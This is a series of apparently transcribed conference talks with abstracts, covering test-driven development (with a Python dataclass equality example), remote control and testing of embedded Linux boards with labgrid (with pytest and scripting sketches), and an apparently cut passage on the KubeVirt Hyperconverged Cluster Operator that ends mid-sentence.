83% of the lines are covered by tests, which in my opinion is really, really good; I do not usually see that much coverage in the projects I have worked on. That is one of the best results of applying this: the code you get is already covered by tests, and the classes do only what we need them to do — nothing extra. So that is a simple example, a bit bigger than a typical TDD kata, because I wanted to look at something a bit closer to a real example.
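Circling back to the equality step: in Java the walkthrough has to hand-write equals, hashCode and toString so that the assertion can compare Film instances by value. In Python the equivalent comes almost for free from a dataclass; the field names below just mirror the example.

```python
# Value equality for the Film model, the Python way: a frozen dataclass generates
# __eq__, __hash__ and __repr__, which is what equals/hashCode/toString provide in Java.
from dataclasses import dataclass

@dataclass(frozen=True)
class Film:
    title: str
    year: int
    genres: tuple             # a tuple (not a list) keeps the instance hashable

def test_films_with_the_same_content_compare_equal():
    a = Film("Matrix", 1999, ("science fiction", "thriller", "action"))
    b = Film("Matrix", 1999, ("science fiction", "thriller", "action"))
    assert a == b             # value equality — the piece the failing assertion needed
    assert len({a, b}) == 1   # consistent hashing comes along with it
```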
So let's go for the final recap, and let me recommend a few things around this. You can find a lot of content online about what testing means, what the test pyramid is, or what the difference between mocks and stubs is — I did not go into too much detail here, but I think it is interesting to understand the concepts around it. There are also write-ups of good practices for different technologies; I put only two here, one about JavaScript and another about Java. And I can definitely recommend having a look at these books. Extreme Programming Explained by Kent Beck is, I think, the first place TDD appeared; it has a nice introduction, but it is more focused on Extreme Programming practices than on TDD itself. If you want to look at TDD specifically, the best starting point is probably Test-Driven Development: By Example, which is the basic introduction, or Test-Driven Development: A Practical Guide, which has more concrete, real examples, including graphical user interfaces and things like that, that can help you understand the process. The Art of Unit Testing is aimed more at C# developers, but it is really easy to read and makes the whole process easy to understand. So, the final recap: I hope it is clear that TDD can help you write code in a simpler and more effective way. Yes, I know it is difficult to adopt, and sometimes it is difficult to maintain the practice, so you have to keep that in mind and keep doing it — I think it is worth at least giving it a try. Your software will have fewer bugs, which means it will be easier to maintain, and your company — and you — will probably be more eager to continue working that way. I hope you liked some of the tips I shared with you, and that they can make your life a bit easier. One of the best things you can do is pair with someone; I think that helps a lot with this. And the last thing: you just have to try again and again and again, and practice again and again, because that is the best way to make it stick. So yeah, I think this is it — time for questions, if you have some. Thank you very much, by the way.
Have you heard of TDD? Are you interested in or familiar with this practice, but have never quite been able to get your head around it? In this session I'd like to present Test-Driven Development (TDD), explaining how it works and what the benefits of using it are. We will look in more detail at this way of developing software, where our software is always built guided by tests. We will go over some history of TDD, the main process we must follow when we work with this technique, and the rules that surround it. We will also list the main advantages and disadvantages that most developers who practice TDD find, and whether the arguments in favour add up to more than those against. Finally, we will review some good habits and practices when applying TDD and see how to do it step by step with a Java code example. At the end of the session, I hope attendees will have a wider understanding of what TDD is, what advantages it brings and why it is worth mastering, and that you will take with you some tricks and good practices that you can apply in your day-to-day life when writing code.
10.5446/52813 (DOI)
Hello and welcome everybody, welcome to my talk about the joy and tears of testing embedded Linux devices — thank you for having me. Let's start with an idea: imagine you are an embedded Linux engineer working on an embedded Linux device. But it is not only you, one person, working on one project — imagine you are 30 colleagues working on at least 30 projects at the same time. Well, that is what we do. I work for Pengutronix; we are an embedded Linux consultancy doing embedded Linux operating system development, and we have customers throughout all industries, so the hardware we work on is really diverse. I am the guy right at the front there, pressing the shutter release on a smartphone: Chris Fiege, senior hardware developer at Pengutronix. If you want to reach out to me, just use my email address or find me on Twitter or GitHub. My job is to develop hardware for testing embedded Linux devices, so that we are able to find all those small bugs that may sneak in when my software colleagues do their daily work. What are we going to talk about today? First, a short overview of why you may want to automate your embedded Linux lab. Next we will have a look at what labgrid is and how it works. Then there is a short demo where I show some of labgrid's features in action, and I will close with the lessons we have learned in three years of using labgrid. So, what do you need to control an embedded Linux device? First of all you need the device itself, in this talk mostly called the device under test, and you will probably need some kind of power source and some kind of serial interface — because even today your primary interface to your bootloader, your Linux kernel or your userland is still a serial interface; at least it is the low-level one you can always use, and it gives you control of your device even if things like the network are not working. Then you will probably need some GPIOs to control user buttons, press reset, or switch the boot mode of your embedded CPU to something other than what the hardware developer initially set. You probably want Ethernet connectivity on your device under test, because it makes it much easier to do a quick turnaround and bring a new BSP image onto the device, or boot it directly from the network — and even if you are not doing that, your device probably has Ethernet anyway, so there is a good chance you will need this interface. Depending on what your device does, there are a variety of other interfaces you may have to take care of: SD cards or USB sticks for mass storage or firmware updates; USB as host or device — as a USB gadget towards some other device, or as a host to interface with some kind of measurement equipment; cameras; CAN, for all the embedded people out there; and HDMI, RGB, DSI, MIPI and so on for graphical input or output, if your device has a display or is connected to a camera. Thinking about that, you could just put this device under test on your desk and you are good to go — there is no need to actually have it remote-controlled, right? Well, there are a few points that may be a good motivation to start your lab automation. First of all, during development there are tasks that you have to repeat over and over again.
Taking a micro SD card out of your device under test, putting it into your card reader and back into the device, and running a few commands on your computer in between — doing that over and over again, well, at least I tend to make errors, and it starts to frustrate me, so I usually try to avoid it. That is where labgrid can definitely help you: it can help you automate device bring-up and device provisioning when you want to try a new BSP image you have just built. Another thing that is often a problem for us: we only get this one device under test, or maybe two, and then we keep one as a cold spare or use it as a production device, or we have two colleagues working on the project and each of them needs one — but most of the time there are no more. So we want to be able to share hardware between colleagues, because even if you are the only one working on a project full-time, you may have to hand tasks over to someone who is specialized in, for example, graphics, or who has to fix a bug in your bootloader, and it is much easier to give them access to the hardware on your desk or somewhere in your lab than to move it physically to their desk. And if you have full remote control over your device under test in the lab, it does not really matter whether it is on your colleague's desk in the same room, somewhere down the hallway, or in a storage room because it is super loud and super bulky — you can even work from home, which is a nice thing in the middle of a global pandemic, at least for me. The last argument for lab automation: if you have such deep control over your device under test, you can also use your lab automation for continuous testing, and you are not only able to test a single software component at a time — you can test the full software stack, from the low-level bootloader stages up to the actual application running on the device, and you can test it on real hardware, not in an emulator. And we use labgrid for that. labgrid is a Python library and toolkit that helps you automate your embedded Linux lab. It is open source, licensed as LGPL-2.1, and you can find it on GitHub. If you want to have a look at the documentation, it is always rendered from the master branch to labgrid.readthedocs.io — maybe have a look while I am talking, to see whether your lab hardware is already supported. When we started designing labgrid, about three and a half years ago, what were our main design criteria? First of all, we wanted a shared pool of hardware between interactive work — what our colleagues do every day — and continuous integration and testing jobs, which mostly run at night. That helps with the scarce hardware we have available, but it also makes debugging easier, because you are always working in the same environment the tests run in. We actively decided against software components on the device under test, because we want to be able to test the actual release image our customer would build for their customer — stripped down, with no debugging and no testing tools included — without needing any software on the device under test beyond the Linux tools we need for the things we actually want to test.
We also wanted labgrid to be extendable, so that it is not in your way if your device under test is in some way special or different from the ones you had before. We did not want to integrate a scheduler, because our continuous integration already has one — and as we are now shifting from Jenkins to GitLab for continuous integration, that pays off, because we can just use the GitLab scheduler and we are fine. The same goes for build systems: as a consultancy we never know what the next build system is we will have to use, and since labgrid only needs the artifacts generated by the build system and does not care about the build system itself, we can use any build system our customer talks us into. And last of all, we did not want to invent a new testing framework — that wheel has been reinvented plenty of times and there are already good ones out there — so we really wanted to concentrate on the missing bit, which is bringing the testing framework to the actual hardware. So let's get into how labgrid works. labgrid is, as I said, a hardware abstraction layer of some sort: we have labgrid in the middle and below it the hardware it abstracts. For example, if you have a serial port connected via USB to the computer running a labgrid software component — fine. If your serial port is connected to some network appliance with 16-plus ports — still no problem, labgrid probably has a driver for that. The same goes for power switches: there are drivers for commercially available power switches in labgrid, but you could also just use one of the GPIOs labgrid supports and wire your own power switch onto that. labgrid has support for GPIOs — as I said, you can use GPIOs on your embedded Linux device, and there are other ways to get GPIOs connected to labgrid, via CANopen or via 1-Wire, for example. If your device under test is connected to an Ethernet switch, you can use SNMP to query the IP address of the device in order to open an SSH connection to it, for example. labgrid supports a lot of USB devices — USB mass storage on one side, so if you want to write an image to your SD card labgrid has support for that, but we also have Android fastboot support, so if your bootloader supports that you can use it to upload an image — and we support a lot of the bootstrapping mechanisms in the ROM code of embedded CPUs, so you can upload your initial bootloader directly from there. On the other side, labgrid provides you with three different kinds of interfaces — that is how you use labgrid. One is a command line interface: that is what you use during interactive work; for example, if you want to switch a device on and get a console on its serial interface, you can do that with labgrid-client. Since labgrid is Python, you can also use it to write short scripts: for example, if you have a problem that occurs only once in a few thousand boots, let labgrid do the heavy lifting, let it do the few thousand boots, and let your script leave the device under test in the error state so that you can have a look at it and see what went wrong. And the last thing is that labgrid comes with a pytest plugin that allows you to write tests for your embedded hardware directly in pytest, like you would for any other software component you test with pytest.
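As a rough idea of what the scripting interface mentioned above looks like, here is a sketch of such a boot-until-it-fails loop. It assumes an environment file that binds a target named "main" with a power driver, a BareboxStrategy and a BareboxDriver (as in the demo later on); the file name and the string we look for are made up for the example.

```python
# Sketch of a "boot it a few thousand times" script (config file and names are illustrative).
from labgrid import Environment

env = Environment("lab-env.yaml")                    # hypothetical environment file
target = env.get_target("main")
strategy = target.get_driver("BareboxStrategy")

for cycle in range(3000):
    strategy.transition("off")                       # power the device under test off ...
    strategy.transition("barebox")                   # ... power it on and stop in the bootloader
    barebox = target.get_driver("BareboxDriver")     # active once the barebox state is reached
    stdout, _, returncode = barebox.run("version")   # run the command we suspect of misbehaving
    if returncode != 0 or not any("barebox" in line for line in stdout):
        print(f"unexpected output in cycle {cycle}; leaving the board in this state")
        break                                        # stop so the error state can be examined by hand
```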
So what is labgrid's view of the world? labgrid has a distributed architecture: there are a few software components that can run in different places on your lab network — or, if you want, they can all run on one and the same machine, and that is totally fine too. First you have your labgrid client, which can be the command line interface, your script or even pytest; those can run on any machine in your network, as long as they can reach the coordinator — the component that keeps track of the current state of your lab — and the exporters, because the exporters are the machines the actual lab automation hardware is connected to. The exporters tell the coordinator about the state of the connected lab automation hardware, so your client knows which hardware is available and where. All these pieces of lab automation hardware are called resources in labgrid, and you can group resources into a logical unit, which is called a place. Usually you take all the lab automation devices you need to control one device under test — which is called a target in labgrid — and bring them together in one place. You can then lock one of these places, because labgrid has a way of locking resources, and then you can work with this target using the resources attached to it. Okay, and now let's switch over to the demo. Today's demo is built around two key components: one is this Raspberry Pi, which is the machine running labgrid and the machine I am currently logged into, and the other is this BeagleBone Black, in combination with this spinning-wheel assembly, which is our device under test. The other two components here are a general-purpose I/O device that we can control via CAN, which in turn drives a relay that switches power to the BeagleBone Black — so this is a fancy CAN-controllable power switch in our demo — and this USB-SD-Mux. That device has a micro SD card on the bottom side, and this micro SD card can be switched between our test server, connected via USB, and our device under test. So what is labgrid's view of this assembly? labgrid sees four resources in this demo: one is the power device that we use to switch the power later on, one is the USB-SD-Mux device, one is a USB mass storage device that represents the micro SD card once it is connected to the test server, and one is a USB serial device, because we are connected to the debug serial port of the BeagleBone Black — that is one of the other USB connections you see here. I have set up one place in labgrid that logically connects all these resources; it is called motor-bone, because it is a BeagleBone Black with something motor-related. Let's have a more detailed look at what is inside this place. There is a lot of output regarding the current state, which is not so important right now, but you can see that this place matches three of our four resources. That is mainly because I realised the USB mass storage resource is not needed — the USB-SD-Mux already provides the mass storage — so I did not select it; it is fine that it is not part of the place, it is just there and nobody uses it. And you can see that I have not locked this place yet, so to interact with it the first thing I have to do is lock it. Once it is locked, I can use labgrid in interactive mode — for example with the configuration I have written for the tests later on.
What I do now is use this configuration file, and the strategy that comes with our test suite, to tell labgrid: please bring this device under test into a known state, boot it into the bootloader, and give me a serial console once you have reached the bootloader. So what labgrid does now: it has switched the USB-SD-Mux to the host so we can write an image onto the SD card, then we will see the SD card switch back — at least on the status LED here — and afterwards it powers on the BeagleBone Black. That has happened now, and the next step is that the barebox driver interrupts the autoboot of the bootloader and drops us into the interactive shell, and I can now run commands inside the interactive shell of this bootloader without having to care about how a new, working image got onto my SD card — that is all batteries-included in labgrid. Of course I do not need to tell labgrid to use a specific state if I already know the device is booted and I just want to have a quick look: I can just tell labgrid to give me a console, I do not care what the state currently is, and again we are inside the bootloader. We could do the same with a Linux shell, because that is another state provided by our test suite, but we would have to re-flash the SD card, and that takes a few seconds — I would rather show you some other nifty things. Okay, the next thing I want to show you is scripting with labgrid. I will now show you a script that uses the image that is currently on the SD card — so we are not going to re-flash it — and afterwards switches the BeagleBone Black on again, captures it in the bootloader and runs a command there. We assume that this command will return some specific string, and if it does not, we are going to quit. This simulates the case where this command might have a bug, and we want to boot and test again and again, and maybe one in a thousand times we are able to hit this bug; afterwards we can have a look at the device and examine its current state. How does it work? First I set up my labgrid environment using the configuration file again, then I make sure I have handles to all the drivers I will need later on and switch our USB-SD-Mux into the device-under-test mode, and then the test cycle begins: first we power the BeagleBone Black on, we make sure we capture it in the bootloader, then once the bootloader starts we run the command, check the output, and if the return values are okay we power the BeagleBone Black off and do the same again. How does it look when running? It first takes a short moment, because we have to switch the USB-SD-Mux back to the BeagleBone Black, and afterwards we are running roughly one cycle per second: powering the BeagleBone Black on, running the command, checking the output, and doing it again. I will stop that now, because even if we ran it a thousand times, I do not think we would hit a bug in this very simple command. The last station on today's demo road trip is the test suite. This test suite makes use of pytest fixtures, which are a cool pytest feature that allows you to pre-define a dependency that you want to have inside a test: a test can reference this barebox_shell fixture, and pytest will make sure the fixture runs before the test does. The fixture basically brings our device under test into the barebox state and returns a handle to the barebox shell.
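Roughly, such a fixture can look like the sketch below. It relies on the target fixture that labgrid's pytest plugin provides when the test run is started with the environment file; the strategy, driver and state names mirror the demo and are otherwise assumptions.

```python
# conftest.py — a sketch of the demo's barebox_shell fixture and one test using it.
# Assumes the run is started with labgrid's pytest plugin and an environment file that
# binds a BareboxStrategy and a BareboxDriver to the target.
import pytest

@pytest.fixture
def barebox_shell(target):
    strategy = target.get_driver("BareboxStrategy")
    strategy.transition("barebox")                    # provision, power on, stop in the bootloader
    return target.get_driver("BareboxDriver")         # the handle the tests use to run commands

def test_barebox_version(barebox_shell):
    stdout = barebox_shell.run_check("version")       # run_check fails the test on a non-zero return code
    assert any("barebox" in line for line in stdout)
```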
With that handle we can run commands in the bootloader; the same applies to the Linux shell fixture here. And the last fixture brings us into the off state — the state where the power is switched off — basically to stop this motor from spinning even if our tests have failed. The tests themselves are easy: we have a test that checks the barebox version command, and we have the same on the Linux side, where we test the output of uname -a to check that we are running the kernel we think we should be running. The last three tests spin our motor, and what those tests do is tell a speed controller: hey, speed controller, please drive this wheel to 50 pulses per second, whatever speed that is. I can then interact with the wheel and slow it down, and by doing that I can provoke a test to fail. So let's provoke some failed tests. I will make the output a little more verbose so we can see which tests are currently running. Okay, first we are again writing a new image to our SD card — let's assume we have just built a new BSP — and afterwards we switch on the BeagleBone Black. The first test, the one in the bootloader, runs basically immediately after switching it on, and after that we boot into Linux. Okay: the SD card is on the BeagleBone Black, the first test has passed, and now we are booting into Linux. This is the first time the system boots, because we have a freshly provisioned SD card, so it has to generate SSH host keys, and this takes a few seconds longer than you would otherwise expect. Okay, the first Linux test has passed, the first motor test has passed, and now I will slow this wheel down — and I will slow it down so far that our test fails. It takes a few seconds, because the speed controller tries to reach its set point — okay, so this test has failed, and the next test will pass, I guess. Yes. Then it switches off, and that concludes the demo part of today's talk. Okay, in the last part of my talk I want to go through the lessons we have learned developing and using labgrid for a little over three years now. First of all, we decided to have one single hardware pool for interactive use and for continuous integration and continuous testing, and that has proven to be a good idea. You only need one set of hardware for whatever you want to do, and it is really convenient, because if one of your tests fails — and from time to time the environment around your device under test is actually part of the problem — then you do the debugging in the very same environment your tests usually run in. But you need to keep in mind: if you want to be able to share a device under test with your developers, you never know what state the developer last left the device in, so you have to make sure you are able to provision the device under test from scratch. In our case that usually includes flashing a new bootloader, even if the old one is broken; you just have to make sure you have all the infrastructure in place to do that. But labgrid — or rather your test suite — has full control over your hardware, so it is up to the test suite to flash a new bootloader, bring your device under test into a specific boot mode, and so on; that is totally possible, and it also allows you to handle all the special or edge cases your device under test may have.
For example, if you want to test firmware updates and you want a broken firmware image in one of your slots: just break it and see what your software does. labgrid allows custom code inside your test suites, so you are totally free to write the support code you need and put it next to your test suite — there is no need to upstream anything to labgrid if you have a special use case you want to use labgrid for. But again, this adds complexity, and you always have to keep in mind that labgrid usually assumes it will provision the device under test from scratch. One decision we made is that the strategies I showed you in the demo are also usable for interactive work and for scripting, as we have seen: you only have to do the heavy lifting once, and then you have full control of your device under test during interactive work and scripting as well. And what I have called reproducible workflows here: since strategies are a kind of documentation-as-code, it is easier to hand a project over to a colleague. If you are ill or on vacation, any colleague will at least be able to boot your device and take it from there, and they can look into the strategy to see what you have done. labgrid has USB support — we support a variety of different USB devices. USB is easy to use and it is widely available: for every lab device you want to use, there is a version with USB available. But after a few years of USB in all our labs, I have to say that USB is a really, really bad idea. We have so many stability issues in our labs, and even if you have just one or two USB devices connected to your test server, or just one device under test on your desk, USB will fail you at some point: a device will simply have bugs or misbehave, you will have USB hubs that cease to work — or where a part of the hub ceases to work and resetting the device via USB is not enough to make it work again — or you have USB serial adapters that are still enumerated and controllable via USB but will not pass any serial data through. And if you do not have just one device under test but a whole lab — it is usually 16 per rack, and we sometimes have 30 USB devices in a lab — that really becomes a problem, and it is really hard to debug. So, if you can: avoid USB wherever possible. I gave a complete talk about the issues with USB at the Automated Testing Summit 2019, so if you want to have a look, the slides are on elinux.org. We decided against a scheduler, but we have a mechanism of locking, together with a reservation mechanism: a developer can lock a place, and so can continuous testing, and continuous testing can also make a reservation. A developer can technically make a reservation too, but I do not think that is really used. So continuous integration and continuous testing use locking and reservations, and when one continuous testing job is already running on a device under test, the next one has a reservation and waits until the first one finishes. That way we do not need to reinvent a scheduler, because continuous integration already has one. But this relies on our developers unlocking their devices under test when they finish work in the evening, so that continuous testing can run, and we do not have a good technical solution for this social issue — so from time to time tests simply do not run, because a developer forgot to unlock their device under test.
labgrid also has a concept of dynamic resources, which means a device can appear while a test suite or a script is already running: for example, you switch your device under test on and boot the embedded CPU into boot-from-USB mode, and a USB device will appear — labgrid is able to handle that and, as I said, lets you wait for these devices to appear. It also gives you some overhead, because labgrid needs to be capable of handling all of that — but that is already solved in software, so it is mostly upsides for us. labgrid's distributed architecture is a big plus for us: we can access our devices under test from everywhere, and we can share them. All devices under test in our office are connected to one central lab coordinator, and you can use them all no matter which office you are in. You can move all the noisy or large devices under test out of your office, obviously, and today you can also work from home, because most of the time you do not need to sit next to your device under test — unless you are doing graphics development; sorry, my graphics colleagues. But having this distributed architecture, with at least two services running on different machines or multiple services on multiple machines, is complex and introduces a lot more moving parts, and we really had to learn that error reporting in such a system is hard. Often, if something fails, identifying the real cause of an error is a manual debugging effort: a colleague who knows the test suite, knows the infrastructure and knows the device under test has to look at a really long Python stack trace to find out what just happened. That is sometimes annoying and tends to be one of the not-so-pleasant things my colleagues bring up. Okay — but even with the complexity and the long Python stack traces, we are still using labgrid and we will continue to, because it really helps us in our day-to-day work. Maybe you are now interested in having a look at labgrid — or maybe you say, nah, I will write my own hardware abstraction layer for my lab; then perhaps our ideas and the lessons we have learned can help you. I think there is a Q&A now, so let's switch over to that. Thank you for having me, and I am really interested to hear your questions.
Embedded development is complex enough. By automating repetitive parts during development and employing testing, a lot of time can be saved and human errors avoided. Additionally, embedded development is usually a team effort: scarce hardware must often be shared between developers and sometimes even with automated testing. labgrid is an open source tool for remote control and testing of embedded Linux devices in a distributed lab. In this talk the presenter takes a look at how labgrid can be used in your embedded lab and what labgrid's developers have learned in over three years of using and developing it. At first the presenter takes a closer look at what is actually needed to fully remote-control an embedded Linux device: What are the typical interfaces that need to be covered? What remote-control hardware is commercially available? Next the presenter will focus on the labgrid [0] framework. labgrid is an embedded board control Python library with a focus on testing, development and general automation. After a short overview of the key design concepts, the presenter will discuss labgrid's architecture. This part finishes with a demo of what interactive development with labgrid looks like and how tests are implemented using pytest. The talk will conclude with a lessons-learned section on the joys and tears of over three years of active labgrid development and use.
10.5446/52817 (DOI)
In general we can have standard Kubernetes resources, such as ConfigMaps and Routes, we can have Kubernetes controllers, such as ReplicaSet, Deployment and even DaemonSet, and we can also have operators. An operator is usually made of a custom resource plus a controller that controls it, carrying the knowledge that is embedded in the code. So let's go back to the operator model. As I said before, an operator is a controller. The general pattern is that we have custom resources where the user can define, and modify over time, a desired state. The controller, which is a piece of software, gets notified about changes via the informer pattern. The controller then runs its reconcile logic: according to the new desired state, it is going to make the world look as desired. So, over time, starting from user changes on the custom resource it watches as its primary resource, the controller periodically reconciles — eventually running again, with a queue system to be able to handle errors — a set of resources in the external world, which is our cluster. At the end, the controller is also supposed to report status back to the end user, updating the status subresource on the custom resource we introduced. I also said that we need a bit of logic, of knowledge, about what we can do — we call it the domain- or application-specific knowledge. This is required to be able to install, to upgrade, to self-heal in case of failures, to properly scale, to clean up if the user for any reason decides to remove our product, to keep it up to date, and so on. All of these features should be automated by a piece of software called the operator. So an operator is based on Kubernetes resource and controller concepts, and it includes domain- or application-specific knowledge to be able to automate common tasks.
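To make the pattern above concrete, here is a deliberately simplified reconcile loop sketched in Python. It is illustrative pseudocode of the idea only — real operators are typically written in Go against client-go or a framework such as the Operator SDK — and the callable names are invented.

```python
# Illustrative sketch of the controller/reconcile pattern (not a real Kubernetes client).
def reconcile_forever(watch_desired_state, read_actual_state, apply_changes, report_status):
    """watch_desired_state yields the desired state each time the custom resource changes
    (in a real controller this is driven by informers and a work queue with retries)."""
    for desired in watch_desired_state():
        actual = read_actual_state()
        if actual != desired:
            apply_changes(desired)                        # domain-specific knowledge lives here
        report_status(desired, read_actual_state())       # update the CR's status subresource
```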
Why does it matter? We want an as-a-service platform experience. We want to build an ecosystem of software on Kubernetes that can be as easy, as safe and as reliable to use and operate as a cloud service. We want to be able to introduce something with low touch — eventually even remotely managed — and with one-click updates. In order to do that, an operator by itself is not enough, and we also need another component that takes care of the whole lifecycle of our operator. This component, which is shipped by default in OpenShift but which you can also install on plain Kubernetes, is called the Operator Lifecycle Manager, or OLM. OLM extends Kubernetes in order to provide a declarative way to install, manage and upgrade operators and their dependencies in your cluster. The Operator Lifecycle Manager provides a streamlined experience for discovering and installing operators. It also provides automated upgrades for operators, with a mechanism called channels, where you can have one or more different upgrade streams, and it provides a framework for building rich and usable user interfaces. In addition to OLM we also have the OperatorHub, which allows cluster administrators to select which operators they want to make available in their clusters to end users. The OperatorHub is accessible only to cluster administrators and can be used to discover and install optional components or applications — and KubeVirt is an optional component on Kubernetes and OpenShift clusters. The OperatorHub can be used to consume an upstream or community project and can also be used for a downstream offering: there can be multiple types of operators — operators specific to the product, operators from external partners, and also community operators. In our case we are going to talk about a community operator. We have a really interesting project called KubeVirt. KubeVirt is managed by an operator, but in order to work on your cluster it also needs additional operators to take care of other components like networking, storage and so on, and all of them have to be orchestrated. KubeVirt is a kind of extension of Kubernetes that lets you run your virtual machines as native objects in Kubernetes or OpenShift. What we want to achieve now is the ability to install KubeVirt with a single click from the OperatorHub — starting from the KubeVirt project, we want something that can be installed as easily as an app on your phone. Under the KubeVirt organization we have multiple components, and so we have multiple operators: the KubeVirt operator for all the core virtualization features; another operator called the Containerized Data Importer, or CDI, which is used to import the source of the persistent volume you are going to use for your virtual machines; a networking-specific operator; another operator that deals with scheduling, scaling and performance; a special operator you can use when you need to set a node into maintenance; and another operator used to import virtual machines from external systems. All of them are different projects under the KubeVirt organization on GitHub. A few minutes ago I was talking about OLM and its ability to install an operator, but here we have more than one operator, and now we need to understand how we can easily install all of them with a single click. The main requirement is that we want a single installable unit. So the first question is whether we can rely on the dependency management mechanism provided by OLM out of the box, or whether we need something more fine-grained. I do not want to go into the details, but I can already tell you that unfortunately, in order to ship a product, we do need something more fine-grained: the idea that the user installs the component operators one by one from OLM is not really feasible and is not going to provide the user experience we are looking for. Think also about the upgrade: the user does not want to separately upgrade the network part, the storage part and the virtualization part, with version mismatches and conflicts along the way. We want to provide a single upgrade path.
Then we want to provide the user with a single entry point to configure the whole product. We do not want to ask the user to create more than one custom resource to configure or start the storage part, the network part and so on: we want a single CR that is used to start and configure the whole KubeVirt product on your cluster. Of course, we need it integrated with OLM. And our operator is also a special one, because in general an operator is something the cluster admin can enable on a cluster, and then each user can choose to start it in a specific namespace. In our case this is a bit different, because KubeVirt ships an additional, really important feature for operating an OpenShift cluster, which is the ability to run virtual machines. This is basically a dedicated control plane, and we want to have just a single instance of that control plane on the whole cluster — we do not want two objects controlling virtual machines on your cluster at the same time. So in our case we need a singleton operator. What is the solution to all these requirements? We implemented a special operator called the Hyperconverged Cluster Operator, or HCO. The goal of the Hyperconverged Cluster Operator is to have a single endpoint for multiple operators — KubeVirt for core virtualization, CDI for storage, the networking one, and so on — where users can deploy and configure them as if they were a single object. HCO does not replace the Operator Lifecycle Manager; it works with it. So HCO is a kind of operator of operators, also known as a meta operator or umbrella operator. HCO provides an opinionated deployment of KubeVirt and its sibling operators, and it is the easiest way to install KubeVirt on your cluster. How does it work? Here we have the user. The user finds the Hyperconverged Cluster Operator in the OperatorHub and creates a special object managed by OLM, a Subscription. A Subscription means: as a cluster admin, I want to configure my cluster to consume that specific operator. All the component operators are shipped together in the artifact that is consumed by OLM: an operator is released to OLM as a special artifact called a ClusterServiceVersion, or CSV, which contains all the information required to configure your cluster to be able to consume the operator — the roles, the service accounts, the deployments, the list of images and so on. We provide OLM with a single, unified CSV. This CSV starts all the operators, but the user creates a single custom resource, the one for the Hyperconverged Cluster Operator. This special operator watches the HyperConverged custom resource, and when the user creates it with the configuration options he wants for his cluster, it is the Hyperconverged Cluster Operator pod that creates a different custom resource for each of the component operators: one that is watched by the KubeVirt operator, another one that is watched by the CDI operator, and so on. The user is not supposed to directly see or edit the custom resources of the component operators — only the top-level, special custom resource of the Hyperconverged Cluster Operator.
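From the user's side, the single entry point boils down to creating exactly one custom resource. As an illustration with the Kubernetes Python client, it could look roughly like this — group, version, plural and the mandatory name and namespace follow the upstream HCO project around the time of the talk, so double-check them against the version you actually install.

```python
# Creating the single HyperConverged CR that HCO watches (illustrative; verify the
# apiVersion and names against the HCO release you deploy).
from kubernetes import client, config

config.load_kube_config()
api = client.CustomObjectsApi()
api.create_namespaced_custom_object(
    group="hco.kubevirt.io",
    version="v1beta1",
    namespace="kubevirt-hyperconverged",
    plural="hyperconvergeds",
    body={
        "apiVersion": "hco.kubevirt.io/v1beta1",
        "kind": "HyperConverged",
        "metadata": {"name": "kubevirt-hyperconverged"},
        "spec": {},   # opinionated defaults; infra/workload placement options would go here
    },
)
```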
It is then HCO that mutates the component custom resources to propagate what the user set on the HyperConverged custom resource; the user only ever interacts with that one CR. As I have already said more than once, we have multiple operators running on the cluster in order to be able to run KubeVirt, but from the OLM point of view OLM is dealing with a single operator. Each of our operators can fail independently, can be unavailable, or can be involved in an upgrade, and they are independent pods, so they can do all of that independently of one another. OLM considers an application to have succeeded if all the pods are ready and the expected number of pods is present, and OLM is only aware of the operators that are directly listed in the ClusterServiceVersion. So we had to introduce a mechanism with which the Hyperconverged Cluster Operator can track the status of the component operators — the storage one, the network one and so on — aggregate that status and report it back to OLM. OLM only waits for the ready status of the pods, but we need to aggregate something more detailed, so we are not only using readiness probes, we are also using conditions. Conditions are the latest available observation of an object's state. They are a common pattern in Kubernetes and basically an extension mechanism intended to be used when the details of the observation are not known a priori and cannot be implied for all instances of a specific kind. The idea is to use conditions, which can be set independently by each operator on its CR, to determine what we need to report back from the HCO pod to OLM. We are talking about more than one condition, because there are different things to consider: we need to check availability, we need to check whether an operator is progressing — updating something towards a different state — and whether an operator reports that it is degraded. So we aggregate these three conditions into a full matrix, where the three independent conditions combined together take on different meanings. The expected status is Available equal to true, Progressing equal to false and Degraded equal to false, which means that all the component operators are 100% healthy and the operator is idle. Then, of course, we can have all the other possible combinations, with different meanings. According to this matrix, HCO sets its readiness probe to communicate with OLM. But HCO is not just reporting its own conditions to OLM: it needs to continuously check the conditions reported by the component operators. That is why we also have an aggregation mechanism with a bit of logic — the logic I was talking about before, the knowledge about application details that an operator has to embed. This is the flow we need to consider when we aggregate conditions from the other operators in order to report the status of the whole product back to OLM. I do not want to go into the details, but you can find this schema in the GitHub repo.
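The aggregation itself is conceptually simple; here is a small sketch of the idea in Python. The real logic lives in HCO's Go code and handles more cases, so treat this purely as an illustration of the matrix described above.

```python
# Illustrative aggregation of the three conditions reported by each component operator.
def aggregate(component_conditions):
    """component_conditions: one dict per operator, e.g.
    {"Available": True, "Progressing": False, "Degraded": False}."""
    available   = all(c.get("Available", False) for c in component_conditions)
    progressing = any(c.get("Progressing", False) for c in component_conditions)
    degraded    = any(c.get("Degraded", False) for c in component_conditions)
    # The "100% healthy and idle" row of the matrix is what feeds the readiness probe.
    ready = available and not progressing and not degraded
    return {"Available": available, "Progressing": progressing,
            "Degraded": degraded, "Ready": ready}
```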
Let's see a quick demo. In this demo I am going to show what the user has to do to install KubeVirt, using the Hyperconverged Cluster Operator, on an OpenShift cluster. You can repeat this on OKD, where the user interface is really similar, and you can do it via the CLI on plain Kubernetes. Here I go to the OperatorHub. I can find more than one catalog source; in this case I configured my cluster to consume a special catalog source where I can see only my own operator. There is more than one upgrade channel; in my case I am going to subscribe to a specific version. I choose to run my operator only in a specific namespace of the cluster, because KubeVirt is a kind of control plane and I do not want to let just any user in the cluster play with it: we want the control plane in a specific namespace, and each user will then be able to start their virtual machines whenever they want, if they have the right to do so, but we do not want normal users interfering with the control plane. And since our operator should be a singleton, it creates a specific namespace by itself and checks that it is running there and only there: the Hyperconverged Cluster Operator is not allowed to run in a namespace with a different name, just because we want to be sure there is only one copy of it. As you can see here, we are not exposing all the custom resources of all the component operators to the user, but just two special custom resources: the HyperConverged one, which is the single entry point for the configuration, and the hostpath provisioner one, which is a kind of special case and therefore is not merged into the first. When I am ready, I simply click the install button, and the cluster starts installing my operator. In the first row I can see what is currently happening, but I am not yet able to create the custom resource for my operator, because the install is still in progress; at the end I will see my operator in that namespace. Depending on the download speed, the install takes about four minutes, nothing more, and I can continuously see what is happening in real time — I will skip part of it. When the operator is ready, as a cluster admin I can create the CR to configure the operator and complete the install process. To do that, I just click the button here. I get a new UI form where I can configure various options of the product, such as where I want to place my infrastructure components, or whether I want to specify custom node 